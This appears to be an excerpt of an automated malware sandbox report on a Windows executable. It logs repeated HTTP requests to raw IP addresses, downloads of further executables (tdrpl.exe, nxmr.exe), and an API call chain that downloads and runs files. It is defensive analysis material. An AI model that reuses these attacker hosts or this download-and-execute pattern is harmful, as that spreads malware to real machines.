                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: unknownTCP traffic detected without corresponding DNS query: 88.151.180.214
                                Source: unknownTCP traffic detected without corresponding DNS query: 88.151.180.214
                                Source: unknownTCP traffic detected without corresponding DNS query: 88.151.180.214
                                Source: unknownTCP traffic detected without corresponding DNS query: 88.151.180.214
                                Source: unknownTCP traffic detected without corresponding DNS query: 88.151.180.214
                                Source: unknownTCP traffic detected without corresponding DNS query: 92.47.47.166
                                Source: unknownTCP traffic detected without corresponding DNS query: 92.47.47.166
                                Source: unknownTCP traffic detected without corresponding DNS query: 92.47.47.166
                                Source: unknownTCP traffic detected without corresponding DNS query: 92.47.47.166
                                Source: unknownTCP traffic detected without corresponding DNS query: 88.151.180.214
                                Source: unknownTCP traffic detected without corresponding DNS query: 92.47.47.166
                                Source: unknownTCP traffic detected without corresponding DNS query: 92.47.47.166
                                Source: unknownTCP traffic detected without corresponding DNS query: 90.156.162.125
                                Source: unknownTCP traffic detected without corresponding DNS query: 90.156.162.125
                                Source: unknownTCP traffic detected without corresponding DNS query: 90.156.162.125
                                Source: unknownTCP traffic detected without corresponding DNS query: 90.156.162.125
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 90.156.162.125
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                                Source: C:\Users\user\Desktop\Us051y7j25.exeCode function: 0_2_001410B0 Sleep,DeleteFileW,CopyFileW,FindWindowA,MoveFileW,DeleteFileW,CopyFileW,FindWindowA,MoveFileW,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,srand,mbstowcs,mbstowcs,wsprintfW,wsprintfW,PathFileExistsW,mbstowcs,mbstowcs,rand,wsprintfW,mbstowcs,mbstowcs,URLDownloadToFileW,ShellExecuteW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_001410B0
                                Source: global trafficHTTP traffic detected: GET /tdrpl.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.215.113.66Connection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /nxmr.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: 185.215.113.84
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /ALLBSTATAASASD HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                                Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                                Source: global trafficDNS traffic detected: DNS query: twizthash.net
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:27:18 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:27:20 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:27:22 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:27:24 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
